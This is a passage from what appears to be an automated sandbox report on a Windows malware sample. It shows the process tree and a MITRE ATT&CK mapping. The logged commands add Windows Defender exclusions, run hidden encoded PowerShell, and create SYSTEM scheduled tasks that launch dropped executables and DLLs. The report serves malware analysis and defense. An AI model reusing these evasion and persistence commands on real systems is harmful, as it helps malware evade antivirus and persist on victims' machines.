"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3640

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3616

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3632

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2028

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4528

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:32
3⤵
PID:1872

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:64
3⤵
PID:1340

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
PID:5116

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
PID:536

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:32
3⤵
PID:1288

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:64
3⤵
PID:2896

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:32
3⤵
PID:2728

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:64
3⤵
PID:3700

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gIzeOJPZE" /SC once /ST 01:15:47 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Creates scheduled task(s)
PID:3640

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gIzeOJPZE"
2⤵
PID:5116

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gIzeOJPZE"
2⤵
PID:3640

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "BAnwxolbGpCzXNxkj" /SC once /ST 11:38:20 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\COawlBb.exe\" XT /Alsite_iduZA 385118 /S" /V1 /F
2⤵
- Creates scheduled task(s)
PID:4368

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "BAnwxolbGpCzXNxkj"
2⤵
PID:696

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4016

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k smphost
1⤵
PID:2112

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:2508

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:2960

C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\COawlBb.exe
C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\COawlBb.exe XT /Alsite_iduZA 385118 /S
1⤵
PID:4608

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bWycNackLSywaqkmgR"
2⤵
PID:1856

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
2⤵
PID:2792

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
3⤵
PID:752

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
4⤵
PID:524

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
5⤵
PID:3048

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
6⤵
PID:4744

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ByWuwrOBU\crKjuS.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qbSDwEgyNYPZlGA" /V1 /F
2⤵
- Creates scheduled task(s)
PID:1932

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "qbSDwEgyNYPZlGA2" /F /xml "C:\Program Files (x86)\ByWuwrOBU\qBmHapn.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:1340

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "qbSDwEgyNYPZlGA"
2⤵
PID:3856

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "qbSDwEgyNYPZlGA"
2⤵
PID:4020

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "yJQYurcljWrTFb" /F /xml "C:\Program Files (x86)\RVqmAwyyxwiU2\szVsifB.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:2792

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:2316

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "MrNSpwukvDtlP2" /F /xml "C:\ProgramData\wGkeBUkfAIhWvVVB\tGQAgve.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:2984

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "qnWLzqfHNJaEQUiUn2" /F /xml "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\Fsjebtp.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:4372

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "FBXQMyjqJGqSqkHthaW2" /F /xml "C:\Program Files (x86)\DUGaRsFaSnqjC\UDjDeTD.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:3476

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "QhciBzJOokLnyYZub" /SC once /ST 06:56:00 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ofqvFcNvzeRditbz\qoxRxkbs\zwzoGPj.dll\",#1 /LEsite_idHjj 385118" /V1 /F
2⤵
- Creates scheduled task(s)
PID:440

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "QhciBzJOokLnyYZub"
2⤵
PID:2960

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "BAnwxolbGpCzXNxkj"
2⤵
PID:4392

\??\c:\windows\system32\rundll32.EXE
c:\windows\system32\rundll32.EXE "C:\Windows\Temp\ofqvFcNvzeRditbz\qoxRxkbs\zwzoGPj.dll",#1 /LEsite_idHjj 385118
1⤵
PID:464

C:\Windows\SysWOW64\rundll32.exe
c:\windows\system32\rundll32.EXE "C:\Windows\Temp\ofqvFcNvzeRditbz\qoxRxkbs\zwzoGPj.dll",#1 /LEsite_idHjj 385118
2⤵
PID:3088

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "QhciBzJOokLnyYZub"
3⤵
PID:212

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:1760

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:220

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:3492

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:780

C:\Windows\System32\MsiExec.exe
C:\Windows\System32\MsiExec.exe -Embedding 6307E51B5E56DA49A5E1FE177CCB8C1D
2⤵
PID:4448

C:\Windows\System32\MsiExec.exe
C:\Windows\System32\MsiExec.exe -Embedding 483ACBCEAC3F9B319689EF926D4353DE E Global\MSI0000
2⤵
PID:1616

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding BDD6BFD7B7D1C19EBDEC28EE4211E273 M Global\MSI0000
2⤵
PID:5044

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:2576

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0 /state0:0xa3a92055 /state1:0x41c64e6d
1⤵
PID:4224

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

System Information Discovery